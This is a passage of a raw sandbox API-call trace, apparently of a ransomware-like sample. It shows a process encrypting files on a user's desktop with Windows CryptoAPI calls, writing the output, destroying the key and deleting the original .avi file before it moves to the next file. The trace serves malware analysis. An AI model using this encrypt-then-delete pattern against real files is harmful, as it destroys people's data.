| out: lpMsg=0x144eb54) returned 0 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49d77e0 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49e2de0 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.304] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0134.304] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.304] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.304] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0134.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0134.305] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0134.305] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0134.305] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0134.305] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0134.305] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49e2de0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49e2de0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0134.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0134.306] WriteFile (in: hFile=0x2a0, lpBuffer=0x49b5608*, nNumberOfBytesToWrite=0xb5f0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49b5608*, lpNumberOfBytesWritten=0x144ef3c*=0xb5f0, lpOverlapped=0x0) returned 1 [0134.309] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caee0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0134.309] CryptDestroyKey (hKey=0x41ac640) returned 1 [0134.309] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.309] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.309] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0134.310] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0134.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.310] FreeLibrary (hLibModule=0x756e0000) returned 1 [0134.310] CloseHandle (hObject=0x258) returned 1 [0134.310] CloseHandle (hObject=0x2a0) returned 1 [0134.424] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi", lpFilePart=0x0) returned 0x2d [0134.424] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\m9-n.avi")) returned 0x20 [0134.424] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dadc4a0, ftCreationTime.dwHighDateTime=0x1d5f0b5, ftLastAccessTime.dwLowDateTime=0xc976ad70, ftLastAccessTime.dwHighDateTime=0x1d5e747, ftLastWriteTime.dwLowDateTime=0xc976ad70, ftLastWriteTime.dwHighDateTime=0x1d5e747, nFileSizeHigh=0x0, nFileSizeLow=0xb5e4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="M9-n.avi", cAlternateFileName="")) returned 0x41ac440 [0134.424] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\m9-n.avi")) returned 1 [0134.473] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dadc4a0, ftCreationTime.dwHighDateTime=0x1d5f0b5, ftLastAccessTime.dwLowDateTime=0xc976ad70, ftLastAccessTime.dwHighDateTime=0x1d5e747, ftLastWriteTime.dwLowDateTime=0xc976ad70, ftLastWriteTime.dwHighDateTime=0x1d5e747, nFileSizeHigh=0x0, nFileSizeLow=0xb5e4, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="M9-n.avi", cAlternateFileName="")) returned 0 [0134.473] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0134.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0134.474] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0134.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0134.475] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.475] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c95190, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x8d217aa0, ftLastAccessTime.dwHighDateTime=0x1d5e245, ftLastWriteTime.dwLowDateTime=0x8d217aa0, ftLastWriteTime.dwHighDateTime=0x1d5e245, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="MjT96UMRMqqhF.swf", cAlternateFileName="MJT96U~1.SWF")) returned 0x41ac440 [0134.475] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0134.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0134.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0134.476] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0134.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0134.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0134.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0134.476] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0134.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0134.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0134.477] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0134.477] 